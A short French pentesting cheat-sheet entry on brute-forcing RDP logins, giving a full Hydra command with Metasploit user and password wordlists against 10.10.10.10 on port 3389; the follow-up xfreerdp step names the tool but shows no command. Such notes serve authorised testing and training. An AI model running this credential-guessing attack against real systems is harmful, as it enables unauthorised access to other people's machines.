RDP Brute Force

Pour effectuer un brute force sur un service RDP, nous utilisons Hydra pour tester un grand nombre de combinaisons d'utilisateurs et de mots de passe.

Exemple d'attaque brute force RDP avec Hydra :

hydra -L /usr/share/metasploit-framework/data/wordlists/commmon_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.10.10.10 -s 3389
  • Cette commande tente de se connecter à l'adresse 10.10.10.10 via le port 3389 (RDP).

  • Pour se connecter à un serveur RDP avec des informations valides, on peut utiliser xfreerdp :

Mis à jour

Ce contenu vous a-t-il été utile ?